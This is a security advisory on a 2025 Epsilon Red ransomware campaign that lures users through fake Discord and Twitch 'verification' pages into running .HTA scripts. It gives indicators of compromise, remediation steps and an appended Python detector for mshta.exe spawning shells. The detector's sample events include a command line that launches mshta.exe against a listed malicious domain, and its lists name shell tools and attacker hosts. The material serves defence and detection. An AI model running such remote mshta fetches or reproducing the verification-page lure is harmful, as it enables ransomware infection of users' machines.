Severity
High
Analysis Summary
A new global wave of ransomware attacks in July 2025 has emerged, utilizing weaponized HTML Application (.HTA) files to deliver a refined version of the Epsilon Red ransomware. Masquerading as “ClickFix” verification portals, attackers have spoofed popular platforms like Discord, Twitch, Kick, and OnlyFans to deceive users into launching malicious payloads under the guise of identity verification. The attack leverages trust in these well-known services to coax victims into interacting with deceptive browser-based elements that sidestep traditional download warnings and antivirus safeguards.
According to the researchers, once a user clicks the verification button, they are redirected to a secondary page that abuses ActiveX controls, a legacy Windows feature still enabled in many environments, especially through Internet Explorer components. The embedded scripts create a backdoor using Windows Script Host (WSH) to silently invoke cmd.exe through mshta.exe. This allows the attacker to retrieve and execute ransomware binaries directly from external infrastructure without initially writing them to disk, effectively bypassing SmartScreen, download quarantine, and many endpoint security tools. Researchers confirmed that the campaign departs from earlier clipboard-based tactics and shows a higher infection success rate because it is quieter and more sophisticated.
Captured live code from infected pages reveals a minimal but powerful JavaScript snippet that uses WScript.Shell to silently fetch and execute a file from IP address 155.94.155.227:2269, with a hidden command shell that ensures no visible trace for users. A second command adds misdirection by displaying a fake “Verification Code” prompt to buy time for the ransomware to finish encrypting files. After infection, the malware gains persistence through Windows task scheduling, launches network reconnaissance, and begins data encryption, leaving ransom notes that stylistically echo REvil’s past attacks but include subtle linguistic differences.
Mitigation of this threat requires immediate hardening of web environments, including disabling ActiveX and WSH, enforcing modern browser policies that block legacy controls, and blacklisting known malicious infrastructure such as twtich[.]cc, capchabot[.]cc, and the associated IPs. Organizations with web-dependent workflows or unmanaged plugin usage are especially vulnerable. Long-term defense strategies must also prioritize employee training via phishing simulations, strict browser management, and adopting zero-trust principles to reduce the blast radius of such socially-engineered, browser-based attack chains.
Impact
- File Encryption
- Gain Access
- Security Bypass
Indicators of Compromise
Domain Name
- twtich.cc
- capchabot.cc
IP
- 213.209.150.188
- 155.94.155.227
MD5
- 98107c01ecd8b7802582d404e007e493
- 2db32339fa151276d5a40781bc8d5eaa
SHA-256
- d735a8bd796d87e6db15cbe35223caf3e2cf8b7c0e11e58b1f6f5fdae20ce16c
- e0a69439563c8534c2ef842d4ffcb16696f286d16585186de20351892f9917f1
SHA-1
- 9d0079fe0fa3480f3f36105ca8c3933ab1004c05
- adf4fe80ccef030466c9d12b4340ea0a3fd02d9a
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Disable ActiveX controls to prevent legacy script execution via Internet Explorer components.
- Disable Windows Script Host (WSH) by restricting wscript.exe and cscript.exe through Group Policy or endpoint protection.
- Block execution of mshta.exe to prevent .HTA files from launching.
- Blacklist the malicious domains twtich[.]cc and capchabot[.]cc in DNS and firewall settings.
- Block IP addresses 155.94.155.227:2269 and 213.209.150.188:8112 at the network perimeter.
- Restrict or fully disable Internet Explorer and enforce the use of secure, modern browsers like Chrome, Edge, or Firefox.
- Implement application control (e.g., AppLocker or WDAC) to block unauthorized scripts and binaries.
- Set up alerts and monitoring for usage of scripting engines such as cmd.exe, PowerShell, and mshta.exe.
- Deploy browser isolation or sandboxing technologies to limit exposure to untrusted content.
- Enhance email and web gateway filtering to block .HTA files and suspicious JavaScript-based payloads.
- Conduct regular phishing simulations to train users to recognize fake verification screens and social engineering lures.
- Apply the principle of least privilege, ensuring users have minimal permissions and no unnecessary admin rights.
- Use endpoint detection and response (EDR/XDR) solutions that can detect in-memory execution and command-line anomalies.
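As an added illustration of the monitoring step above (example code written for this page, not part of the original advisory), the following Python snippet runs the described mshta.exe to cmd.exe chain detection over constructed process-creation records in the style of Sysmon Event ID 1. The event field names, the sample records and the stage-2 command line are assumptions; the domains and IP addresses are the advisory's own indicators.

```python
"""Detect the weaponised .HTA chain from this advisory in process-creation logs."""
import ntpath

# Indicators taken from the advisory (domains and IP addresses)
IOC_HOSTS = {"twtich.cc", "capchabot.cc", "155.94.155.227", "213.209.150.188"}

# A shell or script engine spawned directly by mshta.exe is the hallmark of the chain
LOLBIN_PARENTS = {"mshta.exe"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def classify(event: dict) -> list:
    """Return the names of every detection rule that fires for one event."""
    hits = []
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "").lower()
    if parent in LOLBIN_PARENTS and image in SUSPICIOUS_CHILDREN:
        hits.append("mshta_spawned_shell")
    if any(ioc in cmdline for ioc in IOC_HOSTS):
        hits.append("known_ioc_in_cmdline")
    # mshta.exe pointed at a remote resource instead of a local .hta file
    if image == "mshta.exe" and ("http://" in cmdline or "https://" in cmdline):
        hits.append("mshta_remote_content")
    return hits


def scan(events: list) -> list:
    """Return (index, hits) for every event that triggers at least one rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]


# Constructed sample telemetry (not real captures from the campaign)
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Program Files\Google\Chrome\chrome.exe",
     "CommandLine": "chrome.exe"},
    {"ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "Image": r"C:\Windows\System32\mshta.exe", "CommandLine": "mshta.exe https://capchabot.cc/verify"},
    {"ParentImage": r"C:\Windows\System32\mshta.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c <constructed stage-2 fetch from 155.94.155.227:2269>"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe"},
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(hits)}")
```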